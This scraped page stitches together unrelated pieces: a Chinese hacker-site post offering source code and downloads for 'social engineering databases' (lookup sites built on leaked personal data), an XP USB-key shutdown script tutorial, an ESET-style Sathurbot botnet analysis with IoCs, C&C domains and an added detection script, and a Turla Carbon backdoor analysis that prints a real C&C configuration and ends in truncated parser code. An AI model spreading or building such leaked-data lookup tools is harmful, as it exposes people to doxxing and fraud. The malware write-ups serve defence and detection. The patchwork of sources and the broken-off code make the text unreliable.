A treat has arrived... China has actually blocked social engineering databases (社工库) across the whole internet, because a social engineering database now counts as a crime? Then take these and build one yourselves!!

Since the China Hacker Cloud social engineering database went online, a lot of people have been using it... Besides our overseas servers there was also a domestic version.. but as domestic law keeps tightening up the online environment.. we believe.. we do nothing that wrongs our fellow countrymen.. Is China a major country for citizen data leaks? (Why? Isn't it because certain vulnerability-disclosure platforms publish things.. and certain white hats trade on both sides of the law? Besides, data leaks in China are nothing unusual anymore.. after all, the Chinese hacker scene only ever affects other people through leaked data.) And the birth of the social engineering database also created... (a tiny barrier to entry for social engineering techniques)
We are not hackers.. we are just porters of the internet........ hackers!!!!!!! Social engineering databases... we truly feel sad about leaked data.. because your account, my privileges... pretty awesome, right..
You can use these to set up your own social engineering database to play with.. of course, once it's built, remember you can open a small port and connect it to Hacker Cloud... (the official platform's social engineering database is going online overseas.......... end... please look forward to the domestic version being restored!)
Social engineering database source code collection

It looked roughly like this. Most social engineering databases from around 2013 were modified from this source, including the first-generation QQ group lookup.

ASP + SQL Server, single-table query

Download: bamaba

Modified variant: QQ group login lookup source (I couldn't write a thing back then; it came from frantically hacking on the bamaba source)

CNSEU's source, formerly called 97bug I think. Nostalgic; so many dumps (裤子), hehe

This source searches TXT files directly, no need to import into a database. Simple and crude; plenty of lazy people use it to this day..

TXT + PHP, automatic lookup

Download: cha.97bug.com

 


This source is quite famous; it even made the news, heh

MySQL + PHP, supports multi-table queries

Copyright: Problem

Download: PHP social engineering database source


 

If you like social engineering databases you may not know Helen, but you can't not know Acn

This site has been around since 2013, going from 闪客库 (adapted from the bamaba source) -> 搜库 (the source pictured above) -> 搜云; anyway, it changed names many times and counts as the longest-running social engineering database.

SQL Server + PHP, single-table query

Download (搜库, as pictured above): www.soyun_.org source

Download (this one seems newer): 搜云 social engineering database site program source


Social engineering database with Ajax queries

↑ This is what this source looks like once deployed; it's really the same source with a different skin.

Its feature is that results appear as you search: with many dumps you don't have to sit waiting, you can see results in real time. Pretty slick.

MySQL + PHP, supports multi-table queries

Copyright: C0de (航总)

Download: ajax social engineering database


Source of 社工库.Com

MySQL + PHP, supports multi-table queries

Copyright: C0de (航总)

Database: MySQL

Web: social engineering database source


Source using Sphinx for queries

Original author: http://zone.wooyun.org/content/9377

Sphinx (coreseek) is fast at searching and brainless to import, suitable for lazy people; it's just a bit laborious to configure, so read the docs.

MySQL + PHP + coreseek, single/multi-table queries

Download: sphinx

Copyright: Ph4nt0m


JSP query source

Leaked back then together with the Xiaomi database

Automatically loops through every database, no configuration needed, and displays results based on the database fields automatically. Fairly clever.

But changing the database configuration requires decompiling the jar.. newbies, steer clear.

MySQL + JSP, supports multi-table queries

Copyright: shack2

Download: SGWeb (1)


Solr query source

A fairly old-school social engineering database; the data volume doesn't seem large, uh..

I don't know Solr well, so no further comment.

Solr + ThinkPHP, supports multi-table queries

Copyright: 刑天

Download:


MongoDB query source

I don't really understand MongoDB either; it seems to be a non-relational database.

This one is rather big; the author is very generous and packaged the tutorial and the environment too.

MongoDB + PHP

Copyright: 无解

Download: http://115.com/lb/5lbc9gzmnc0h


Helen Anonymous social engineering database

Actually the same as 搜云, on the same server, only the interface differs.

SQL Server + PHP, single-table query

Download: 黑论 social engineering database 1

China Hacker Cloud teaches you how to turn a USB drive into a key for getting into the system

USB drives keep getting bigger and cheaper, so they're extremely widespread; I'm sure everyone has one. Want to use a USB drive as the key that opens the door to XP, to protect your beloved machine? Then other people won't be able to boot it because they lack the matching USB key, and security improves greatly. The method is very simple and needs no third-party software, just XP's own Group Policy tool, in only 3 steps.

Step 1: plug in the USB drive, then double-click to open "My Computer" and check which drive letter Windows XP assigned to your USB drive. Mine is K. Copy any personal file to the root directory of the USB drive; I put a photo there named "U.JPG".

Step 2: open Windows XP's Notepad and enter one command:

if not exist K:\u.jpg shutdown -s -f -t 3 -c "Sorry,你不是本机主人,回绝开机!"

Here "shutdown" is the shutdown command, "-s" is the parameter for shutting down ("-r" would be restart), "-f" forces the shutdown, "-t" is followed by the 3-second countdown, and "-c" is the message shown at shutdown. The command means: if the file "U.jpg" is not found on drive K, display "Sorry, you are not the owner of this machine, boot refused!" and shut down automatically after 3 seconds. Of course, if in step 1 you copied an MP3 file such as "HackerXfiles.mp3" instead, that works too; just change the command line accordingly. Then save the text as "Check.bat", with the save location set to C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup on Windows XP's system drive (the GroupPolicy folder is hidden by default, so first make it visible under "Folder Options"). Change the file extension to bat; the file name can be anything, e.g. hackXfiles.bat.

Step 3: open the Run box directly by pressing Win+R and enter "gpedit.msc". Find "Local Computer Policy" -> "Computer Configuration" -> "Windows Settings" -> "Scripts (Startup/Shutdown)", then double-click the "Startup" item on the right. In the "Startup Properties" window that opens click the "Add" button, then in the "Add a Script" window click "Browse"; Windows XP will automatically go to the C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup folder on the system drive. Select the Check.bat batch file you just created and click "Open"; then click "OK" once in the "Startup" window, and finally close the Group Policy window.

OK, a perfect USB key has been made; from now on just plug the USB drive into the machine before starting XP. When the script runs it will check whether the file "U.JPG" exists, and if the file is not found it will force a shutdown after 3 seconds. Grab your USB drive and try it!

Sathurbot: Distributed WordPress password attack

This article sheds light on the current ecosystem of the Sathurbot backdoor trojan, in particular exposing its use of torrents as a delivery medium and its distributed brute-forcing of weak WordPress administrator accounts.

The torrent leecher

Looking to download a movie or software without paying for it? There might be associated risks. It just might happen that your favorite search engine returns links to torrents on sites that normally have nothing to do with file sharing. They may, however, run WordPress and have simply been compromised.

Some examples of search results:

Clicking on some of those links returns the pages below (notice how some even use HTTPS):

The movie subpages all lead to the same torrent file, while all the software subpages lead to another torrent file. When you begin torrenting in your favorite torrent client, you will find the file is well-seeded and thus appears legitimate. If you download the movie torrent, its content will be a file with a video extension accompanied by an apparent codec pack installer and an explanatory text file. The software torrent contains an apparent installer executable and a small text file. The objective of both is to entice the victim into running the executable, which loads the Sathurbot DLL.

After you start the executable, you are presented with a message like this:

While you ponder your options, bad things start to happen in the background. You have just become a bot in the Sathurbot network.

Backdoor and downloader

On startup, Sathurbot retrieves its C&C with a query to DNS. The response comes as a DNS TXT record. Its hex string value is decrypted and used as the C&C domain name for status reporting, task retrieval and to get links to other malware downloads.

Sathurbot can update itself and download and start other executables. We have seen variations of Boaxxe, Kovter and Fleercivet, but that is not necessarily an exhaustive list.

The Sathurbot then reports its successful installation along with a listening port to the C&C. Periodically, it reports to the C&C that it is alive and well, waiting for additional tasks.

Web crawler

Sathurbot comes with some 5,000 plus basic generic words. These are randomly combined to form a 2-4 word phrase combination used as a query string via the Google, Bing and Yandex search engines.

From the webpages at each of those search result URLs, a random 2-4 word long text chunk is selected (this time it might be more meaningful as it is from real text) and used for the next round of search queries.

Finally, the second set of search results (up to first three pages) are harvested for domain names.

The extracted domain names are all subsequently probed for being created by the WordPress framework. The trick here is to check the response for the URL http://[domain_name]/wp-login.php.

Afterward the root index page of the domain is fetched and probed for the presence of other frameworks. Namely, they are also interested in: Drupal, Joomla, PHP-NUKE, phpFox, and DedeCMS.

Upon startup, or at certain time intervals, the harvested domains are sent to the C&C (a different domain is used than the one for the backdoor – a hardcoded one).

Distributed WordPress password attack

The client is now ready to get a list of domain access credentials (formatted as login:password@domain) to probe for passwords. Different bots in Sathurbot’s botnet try different login credentials for the same site. Every bot only attempts a single login per site and moves on. This design helps ensure that the bot doesn’t get its IP address blacklisted from any targeted site and can revisit it in the future.

During our testing, lists of 10,000 items to probe were returned by the C&C.

For the attack itself, the XML-RPC API of WordPress is used. In particular, the wp.getUsersBlogs API is abused. A typical request looks like:

The sequence of probing a number of domain credentials is illustrated in the following figure:

The response is evaluated and results posted to the C&C.

Torrent client – seeder

The bot has the libtorrent library integrated and one of the tasks is to become a seeder – a binary file is downloaded, torrent created and seeded.

The BitTorrent bootstrap

That completes the cycle from a leecher to an involuntary seeder:

Note: Not every bot in the network is performing all the functions, some are just web crawlers, some just attack the XML-RPC API, and some do both. Also, not every bot seems to be seeding a torrent.

Impact

The above-mentioned attempts on /wp-login.php from a multitude of users, even against websites that do not host WordPress, are the direct impact of Sathurbot. Many web admins observe this and wonder why it is happening. In addition, WordPress sites can see the potential attacks on wp.getUsersBlogs in their logs.

Examination of logs, system artifacts and files shows that the botnet consists of over 20,000 infected computers and has been active since at least June 2016.

Occasionally, we have seen torrent links being sent by email as well.

Detection

Web Admins – Check for unknown subpages and/or directories on the server. If they contain any references to torrent download offers, check logs for attacks and possible backdoors.

Users – Run Wireshark with the filter http.request while no web browser is open and look for an excessive number of requests like GET /wp-login.php and/or POST /xmlrpc.php. Alternatively, check for the files or registry entries listed in the IoC section below.
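As an added example (not code from the original article), the following Python script implements the two checks a site operator can build from the description above: it extracts the methodName from an XML-RPC request body so that calls to wp.getUsersBlogs can be logged or blocked at the application layer, and it counts distinct source IPs per watched endpoint in web-server logs, because the one-attempt-per-bot design described earlier defeats per-IP rate limiting. The access-log lines, the request body (with placeholder credentials) and the min_sources threshold are all constructed for this example.

```python
import re
from collections import defaultdict
from xml.etree import ElementTree

# Constructed Apache combined-format access log lines (not real Sathurbot traffic).
# Many distinct source IPs each make a single attempt, which is the pattern the
# article describes: one login per bot per site.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Apr/2017:08:01:02 +0000] "GET /wp-login.php HTTP/1.1" 200 2133 "-" "Mozilla/5.0"
203.0.113.11 - - [10/Apr/2017:08:01:07 +0000] "POST /xmlrpc.php HTTP/1.1" 200 418 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Apr/2017:08:01:09 +0000] "GET /wp-login.php HTTP/1.1" 404 512 "-" "Mozilla/5.0"
198.51.100.8 - - [10/Apr/2017:08:01:15 +0000] "POST /xmlrpc.php HTTP/1.1" 200 418 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Apr/2017:08:01:20 +0000] "POST /xmlrpc.php HTTP/1.1" 200 418 "-" "Mozilla/5.0"
192.0.2.45 - - [10/Apr/2017:08:02:01 +0000] "GET /index.php HTTP/1.1" 200 9011 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Apr/2017:08:03:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2133 "-" "Mozilla/5.0"
"""

# Enough of the combined log format to get client IP, method and path.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)')

# Endpoints the article says are hit: the login page probe and the XML-RPC call.
WATCHED = {("GET", "/wp-login.php"), ("POST", "/xmlrpc.php")}


def probe_sources(log_text):
    """Map each watched (method, path) to the set of distinct client IPs that hit it."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        key = (m.group("method"), m.group("path").split("?", 1)[0])
        if key in WATCHED:
            hits[key].add(m.group("ip"))
    return hits


def looks_distributed(log_text, min_sources=3):
    """Flag watched endpoints hit by at least min_sources distinct IPs.

    A per-IP threshold would miss this traffic: each bot sends one attempt and
    moves on, so the signal is the breadth of sources, not the rate per source.
    """
    hits = probe_sources(log_text)
    return {f"{m} {p}": len(ips) for (m, p), ips in hits.items() if len(ips) >= min_sources}


def xmlrpc_method(body):
    """Return the methodName of an XML-RPC methodCall body, or None if it is not one."""
    try:
        root = ElementTree.fromstring(body)
    except ElementTree.ParseError:
        return None
    if root.tag != "methodCall":
        return None
    name = root.find("methodName")
    return name.text.strip() if name is not None and name.text else None


# Constructed request body of the shape the article says is abused;
# the credentials are placeholders, not real values.
SAMPLE_BODY = """<?xml version="1.0"?>
<methodCall><methodName>wp.getUsersBlogs</methodName>
<params><param><value><string>PLACEHOLDER_USER</string></value></param>
<param><value><string>PLACEHOLDER_PASS</string></value></param></params></methodCall>"""

# Methods a site that does not need XML-RPC can refuse outright.
FLAGGED_METHODS = {"wp.getUsersBlogs"}


def is_flagged_call(body):
    return xmlrpc_method(body) in FLAGGED_METHODS


if __name__ == "__main__":
    print(looks_distributed(SAMPLE_LOG))           # {'POST /xmlrpc.php': 3}
    print(xmlrpc_method(SAMPLE_BODY), is_flagged_call(SAMPLE_BODY))
```

The threshold of three distinct sources is deliberately low for the sample; on a real site the count of distinct IPs hitting /xmlrpc.php per hour is the number to baseline.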

ESET users are protected from this threat on multiple levels.

Removal

Web Admins – Change passwords, remove subpages not belonging to site, optionally wipe and restore the site from a backup.

Users – Using a third-party file manager, find the suspect .DLL (note that the files and directories have the hidden attribute set), open Process Explorer or Task Manager, kill explorer.exe and/or rundll32.exe, delete (quarantine) the affected .DLL, and reboot.

Note: this will remove Sathurbot only, and not any other malware it may have also downloaded.

Alternatively, consider a comprehensive anti-malware product, or at least an online scanner.

Prevention

Web Admins – Should the normal functioning of the website not require the XML-RPC API, you are advised to disable it and use complex passwords.

Users – Avoid both running executables downloaded from sources other than those of respected developers, and downloading files from sites not designed primarily as file-sharing sites.

IoCs

Currently, we have observed Sathurbot installing to:

\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll

\ProgramData\Microsoft\Performance\TheftProtection\TheftProtection.dll

\ProgramData\Microsoft\Performance\Monitor\SecurityHelper.dll

\Users\*****\AppData\Local\Microsoft\Protect\protecthost.dll

The DLL runs in the context of the rundll32.exe or explorer.exe process and locks its files and registry keys against editing. The installer carries both 32-bit and 64-bit versions.

Subfolders of the above (contain the files seeded by torrent)
\SecurityCache\cache\resume\
\SecurityCache\cache\rules\
\SecurityCache\data\
\SecurityCache\zepplauncher.mif – contains the DHT nodes
\temp\

%appdata%\SYSHashTable\ – contains folders representing the hashes of visited domains
%appdata%\SYSHashTable\SyshashInfo.db – collection of interesting domains found incl. framework info

Samples (SHA-1)

Installers:
2D9AFB96EAFBCFCDD8E1CAFF492BFCF0488E6B8C
3D08D416284E9C9C4FF36F474C9D46F3601652D5
512789C90D76785C061A88A0B92F5F5778E80BAA
735C8A382400C985B85D27C67369EF4E7ED30135
798755794D124D00EAB65653442957614400D71D
4F52A4A5BA897F055393174B3DFCA1D022416B88
8EDFE9667ECFE469BF88A5A5EBBB9A75334A48B9
5B45731C6BBA7359770D99124183E8D80548B64F
C0F8C75110123BEE7DB5CA3503C3F5A50A1A055E
C8A514B0309BCDE73F7E28EB72EB6CB3ABE24FDD
AF1AE760F055120CA658D20A21E4B14244BC047D
A1C515B965FB0DED176A0F38C811E6423D9FFD86
B9067085701B206D2AC180E82D5BC68EDD584A8B
77625ADEA198F6756E5D7C613811A5864E9874EA
Sathurbot dll:
F3A265D4209F3E7E6013CA4524E02D19AAC951D9
0EA717E23D70040011BD8BD0BF1FFAAF071DA22C
2381686708174BC5DE2F04704491B331EE9D630B
2B942C57CEE7E2E984EE10F4173F472DB6C15256
2F4FAA5CB5703004CA68865D8D5DACBA35402DE4
4EBC55FDFB4A1DD22E7D329E6EF8C7F27E650B34
0EF3ECD8597CE799715233C8BA52D677E98ABDFD
0307BBAC69C54488C124235449675A0F4B0CCEFA
149518FB8DE56A34B1CA2D66731126CF197958C3
3809C52343A8F3A3597898C9106BA72DB7F6A3CB
4A69B1B1191C9E4BC465F72D76FE45C77A5CB4B0
5CCDB41A34ADA906635CE2EE1AB4615A1AFCB2F2
6C03F7A9F826BB3A75C3946E3EF75BFC19E14683
8DA0DC48AFB8D2D1E9F485029D1800173774C837
AC7D8140A8527B8F7EE6788C128AFF4CA92E82C2
E1286F8AE85EB8BD1B6BE4684E3C9E4B88D300DB

Additional payloads:

C439FC24CAFA3C8008FC01B6F4C39F6010CE32B6
ABA9578AB2588758AD34C3955C06CD2765BFDF68
DFB48B12823E23C52DAE03EE4F7B9B5C9E9FDF92
FAFF56D95F06FE4DA8ED433985FA2E91B94EE9AD
B728EB975CF7FDD484FCBCFFE1D75E4F668F842F
59189ABE0C6C73B66944795A2EF5A2884715772E
C6BDB2DC6A48136E208279587EFA6A9DD70A3FAA
BEAA3159DBE46172FC79E8732C00F286B120E720
5ED0DF92174B62002E6203801A58FE665EF17B76
70DFABA5F98B5EBC471896B792BBEF4DB4B07C53
10F92B962D76E938C154DC7CBD7DEFE97498AB1E
426F9542D0DDA1C0FF8D2F4CB0D74A1594967636
AA2176834BA49B6A9901013645C84C64478AA931
1C274E18A8CAD814E0094C63405D461E815D736A
61384C0F690036E808F5988B5F06FD2D07A87454
F32D42EF1E5ED221D478CFAA1A76BB2E9E93A0C1
594E098E9787EB8B7C13243D0EDF6812F34D0FBA
1AAFEBAA11424B65ED48C68CDEED88F34136B8DC
BA4F20D1C821B81BC324416324BA7605953D0605
E08C36B122C5E8E561A4DE733EBB8F6AE3172BF0
7748115AF04F9FD477041CB40B4C5048464CE43E
3065C1098B5C3FC15C783CDDE38A14DFA2E005E4
FA25E212F77A06C0B7A62C6B7C86643660B24DDA
FADADFFA8F5351794BC5DCABE301157A4A2EBBCF
B0692A03D79CD2EA7622D3A784A1711ADAABEE8D
9411991DCF1B4ED9002D9381083DE714866AEA00

Associated domains

DNS:
zeusgreekmaster.xyz
apollogreekmaster.xyz

C&C:
jhkabmasdjm2asdu7gjaysgddasd.xyz
boomboomboomway.xyz
mrslavelemmiwinkstwo.xyz
uromatalieslave.space
newforceddomainisherenow.club
justanotherforcedomain.xyz
artemisoslave.xyz
asxdq2saxadsdawdq2sasaddfsdfsf4ssfuckk.xyz
kjaskdhkaudhsnkq3uhaksjndkud3asds.xyz
badaboommail.xyz

Torrent trackers:
badaboomsharetracker.xyz
webdatasourcetraffic.xyz
sharetorrentsonlinetracker.xyz
webtrafficsuccess.xyz

Registry values

You may need to use a third-party tool, as Windows Regedit might not even show these:

HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{variable GUID} = “v2.10|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|App=C:\\Windows\\explorer.exe|Name=Windows Explorer|”

HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{variable GUID} = “v2.10|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|App=C:\\Windows\\system32\\rundll32.exe|Name=Windows host process (Rundll32)|”

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\0TheftProtectionDll = {GUID1}
HKLM\SOFTWARE\Classes\CLSID\{GUID1} = “Windows Theft Protection”
HKLM\SOFTWARE\Classes\CLSID\{GUID1}\InprocServer32 = “C:\\ProgramData\\Microsoft\\Performance\\TheftProtection\\TheftProtection.dll”
HKLM\SOFTWARE\Classes\CLSID\{GUID1}\InprocServer32\ThreadingModel = “Apartment”

HKLM\SOFTWARE\Classes\CLSID\{GUID2}

The {GUID2} entries vary across samples and have 6-character-long subkeys; their content is of binary type and encrypted, and is used to store variables, temporary values and settings, IPs, C&Cs and the UID.

e.g. {GUID2} entries look like

HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000003
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000002
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000001
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000009
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000011
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00010001
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00010002
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000008
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000007
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000004
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000010
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00020001


Carbon Paper: Peering into Turla’s second stage backdoor

The Turla espionage group has been targeting various institutions for many years. Recently, we found several new versions of Carbon, a second stage backdoor in the Turla group arsenal. Last year, a technical analysis of this component was made by Swiss GovCERT.ch as part of their report detailing the attack that a defense firm owned by the Swiss government, RUAG, suffered in the past.

This blog post highlights the technical innovations that we found in the latest versions of Carbon we have discovered.

Looking at the different versions numbers of Carbon we have, it is clear that it is still under active development. Through the internal versions embedded in the code, we see the new versions are pushed out regularly. The group is also known to change its tools once they are exposed. As such, we have seen that between two major versions, mutexes and file names are being changed.

Infection vectors

The Turla group is known to be painstaking and work in stages, first doing reconnaissance on their victims’ systems before deploying their most sophisticated tools such as Carbon.

A classic Carbon compromise chain starts with a user receiving a spearphishing email or visiting a previously compromised website, typically one that the user visits regularly — a technique known as a watering hole attack.

After a successful attack, a first stage backdoor — such as Tavdig [1] or Skipper [2] — is installed on the user machine. Once the reconnaissance phase is over, a second stage backdoor, like Carbon, is installed on key systems.

Technical analysis

Carbon is a sophisticated backdoor used to steal sensitive information from targets of interest by the Turla group.

This malware shares some similarities with “Uroburos”[3], a rootkit used by the same group. The most relevant resemblance is the communication framework. Indeed, both of them provide communication channels between different malware components. The communication objects are implemented in the same way, the structures and vtables look identical except that there are fewer communication channels provided in Carbon. Indeed, Carbon might be a “lite” version of Uroburos (without kernel components and without exploits).

For Turla group to decide to install Carbon on a system, a (stage 1) recognition tool is usually delivered first to the target: this tool collects several pieces of information about the victim’s machine and its network (through Tavdig or Skipper for example). If the target is considered interesting enough, it will receive more sophisticated malware (such as Carbon or Uroburos).

Global architecture

The Carbon framework consists of:

  • a dropper that installs the carbon components and its configuration file
  • a component that communicates with the C&C
  • an orchestrator that handles the tasks, dispatches them to other computers on the network and injects into a legitimate process the DLL that communicates with the C&C
  • a loader that executes the orchestrator

Carbon Dating

The orchestrator and the injected library have their own development branch.

Thanks to the compilation dates and the internal versions numbers hardcoded in the PE files, we might have the following timeline:

Table 1 – Carbon development timeline

Carbon files

The files from the Carbon framework can have different names depending on the version but they all keep the same internal name (from the metadata) regardless of the version:

  • the dropper: “SERVICE.EXE”
  • the loader: “SERVICE.DLL” or “KmSvc.DLL”
  • the orchestrator: “MSIMGHLP.DLL”
  • the injected library: “MSXIML.DLL”

Each of these files exists in 32-bit and 64-bit versions.

Working directory

Several files are created by Carbon to keep logs, tasks to execute and configuration that will modify the malware’s behavior. The contents of the majority of these files are encrypted with the CAST-128 algorithm[4].

A base working directory will contain the files/folders related to Carbon. This directory is chosen randomly among the folders in %ProgramFiles% but excluding “WindowsApps”.

The filenames are hardcoded in the orchestrator. The same names are used in the 3.7x+ branch. Because the injected library accesses the same files as the orchestrator, it is another easy way to link a library version and an orchestrator.

Carbon 3.7x files tree view:
%carbon_working_folder%   // base folder
├── 0208                  // tasks results and logs files
│   ├── C_56743.NLS       // contains list of files to send to the C&C server, this file is neither compressed nor encrypted
├── asmcerts.rs
├── getcerts.rs
├── miniport.dat          // configuration file
├── msximl.dll            // injected library (x32)
├── Nls                   // contains tasks (commands to be executed or PE file) and their configuration files
│   ├── a67ncodc.ax       // tasks to be executed by the orchestrator
│   ├── b9s3coff.ax       // tasks to be executed by the injected library
├── System                // plugins folder
│   ├── bootmisc.sdi      // not used
├── qavscr.dat            // error log
├── vndkrmn.dic           // log
└── ximarsh.dll           // injected library (x64)

Since version 3.80, all filenames have changed.

Carbon 3.8x files tree view:
%carbon_working_folder%   // base folder
├── 0409                  // contains tasks (commands to be executed or PE file) and their configuration files
│   ├── cifrado.xml       // tasks to be executed by the injected library
│   ├── encodebase.inf    // tasks to be executed by the orchestrator
├── 1033                  // tasks results and logs files
│   ├── dsntype.gif       // contains list of files to send to the C&C server, this file is neither compressed nor encrypted
├── en-US                 // plugins folder
│   ├── asmlang.jpg       // not used
├── fsbootfail.dat        // error log
├── mkfieldsec.dll        // injected library (x32)
├── preinsta.jpg          // log
├── wkstrend.xml          // configuration file
├── xmlrts.png
└── zcerterror.png

File access

In the case of the majority of the files from the Carbon working folder, when one is accessed by the malware, the following steps are taken:

  • a specific mutex is used to ensure its exclusive access.
  • the file is decrypted (CAST-128)
  • when the operations on the file are done, the file is reencrypted (CAST-128)
  • the mutex is released

Mutexes

The following mutexes are created by the orchestrator in Carbon 3.7x:

  • “Global\\MSCTF.Shared.MUTEX.ZRX” (used to ensure exclusive access to “vndkrmn.dic”)
  • “Global\\DBWindowsBase” (used to ensure exclusive access to “C_56743.NLS”)
  • “Global\\IEFrame.LockDefaultBrowser” (used to ensure exclusive access to “b9s3coss.ax”)
  • “Global\\WinSta0_DesktopSessionMut” (used to ensure exclusive access to “a67ncodc.ax”)
  • “Global\{5FA3BC02-920F-D42A-68BC-04F2A75BE158}” (used to ensure exclusive access to new files created in “Nls” folder)
  • “Global\\SENS.LockStarterCacheResource” (used to ensure exclusive access to “miniport.dat”)
  • “Global\\ShimSharedMemoryLock” (used to ensure exclusive access to “asmcerts.rs”)

In carbon 3.8x, the filenames and the mutex names have changed:

  • “Global\\Stack.Trace.Multi.TOS” (used to ensure exclusive access to “preinsta.jpg”)
  • “Global\\TrackFirleSystemIntegrity” (used to ensure exclusive access to “dsntype.gif”)
  • “Global\\BitswapNormalOps” (used to ensure exclusive access to “cifrado.xml”)
  • “Global\\VB_crypto_library_backend” (used to ensure exclusive access to “encodebase.inf”)
  • “Global\{E41B9AF4-B4E1-063B-7352-4AB6E8F355C7}” (used to ensure exclusive access to new files created in “0409” folder)
  • “Global\\Exchange.Properties.B” (used to ensure exclusive access to “wkstrend.xml”)
  • “Global\\DatabaseTransSecurityLock” (used to ensure exclusive access to “xmlrts.png”)

These mutexes are also used in the injected dll to ensure that the orchestrator has been executed.

Configuration File

The configuration file affects the malware’s behavior. The file format is similar to “inf” files used by Windows. It contains among others:

  • an “object_id” that is a unique uuid used to identify the victim, when the value is not set in the file, it is generated randomly by the malware
  • a list of processes into which code is injected (iproc)
  • the frequency and time for task execution / backup logs / connection to the C&C ([TIME])
  • the IP addresses of other computers on the network ([CW_LOCAL])
  • the C&C server addresses ([CW_INET])
  • the named pipes used to communicate with the injected library and with the other computers ([TRANSPORT])

This file might be updated later. Indeed, in the communication library, some cryptographic keys are used to encrypt/decrypt data and these keys are retrieved from a section [CRYPTO] in the configuration file that does not exist when the file is dropped from the loader resources.

Carbon 3.77 configuration file:
[NAME]
object_id=
iproc = iexplore.exe,outlook.exe,msimn.exe,firefox.exe,opera.exe,chrome.exe
ex = #,netscape.exe,mozilla.exe,adobeupdater.exe,chrome.exe
[TIME]
user_winmin = 1800000
user_winmax = 3600000
sys_winmin = 3600000
sys_winmax = 3700000
task_min = 20000
task_max = 30000
checkmin = 60000
checkmax = 70000
logmin =  60000
logmax = 120000
lastconnect=111
timestop=
active_con = 900000
time2task=3600000
[CW_LOCAL]
quantity = 0
[CW_INET]
quantity = 3
address1 = doctorshand.org:80:/wp-content/about/
address2 = www.lasac.eu:80:/credit_payment/url/
address3 = www.shoppingexpert.it:80:/wp-content/gallery/
[TRANSPORT]
system_pipe = comnap
spstatus = yes
adaptable = no
[DHCP]
server = 135
[LOG]
logperiod = 7200
[WORKDATA]
run_task=
run_task_system=
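An added Python example (not code from the article, and not the malware's own parser) that reads a Carbon configuration of the format above with configparser and pulls out what an analyst wants first: the C&C endpoints under [CW_INET] in host:port:path form, the peer list under [CW_LOCAL], the injection target list, the task timing window and the named pipe. The configuration text is the 3.77 sample from the article; the assumption that [CW_LOCAL] entries use the same addressN layout is mine, and with quantity = 0 nothing depends on it.

```python
import configparser
from io import StringIO

# Carbon 3.77 configuration as printed in the article, used here as test input.
CARBON_CONF = """\
[NAME]
object_id=
iproc = iexplore.exe,outlook.exe,msimn.exe,firefox.exe,opera.exe,chrome.exe
ex = #,netscape.exe,mozilla.exe,adobeupdater.exe,chrome.exe
[TIME]
user_winmin = 1800000
user_winmax = 3600000
sys_winmin = 3600000
sys_winmax = 3700000
task_min = 20000
task_max = 30000
checkmin = 60000
checkmax = 70000
logmin =  60000
logmax = 120000
lastconnect=111
timestop=
active_con = 900000
time2task=3600000
[CW_LOCAL]
quantity = 0
[CW_INET]
quantity = 3
address1 = doctorshand.org:80:/wp-content/about/
address2 = www.lasac.eu:80:/credit_payment/url/
address3 = www.shoppingexpert.it:80:/wp-content/gallery/
[TRANSPORT]
system_pipe = comnap
spstatus = yes
adaptable = no
[DHCP]
server = 135
[LOG]
logperiod = 7200
[WORKDATA]
run_task=
run_task_system=
"""


def load_config(text):
    """Parse the INI-like file. Interpolation is off so a '%' in a value cannot
    break parsing, key case is preserved, and only a whole-line '#' counts as a
    comment, so the 'ex' value that starts with '#' survives intact."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str
    cp.read_file(StringIO(text))
    return cp


def endpoints(cp, section):
    """(host, port, path) for each addressN in a section, as far as 'quantity' says.
    [CW_INET] holds the C&C servers; [CW_LOCAL] is assumed to use the same layout."""
    if section not in cp:
        return []
    sect = cp[section]
    out = []
    for i in range(1, int(sect.get("quantity", "0")) + 1):
        raw = sect.get(f"address{i}", "")
        if not raw:
            continue
        parts = raw.split(":", 2)
        host = parts[0]
        port = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else None
        path = parts[2] if len(parts) > 2 else ""
        out.append((host, port, path))
    return out


def injection_targets(cp):
    """Processes the orchestrator injects the communication library into (iproc)."""
    return [p.strip() for p in cp["NAME"].get("iproc", "").split(",") if p.strip()]


def task_window_ms(cp):
    """Min/max delay between task executions, in milliseconds."""
    t = cp["TIME"]
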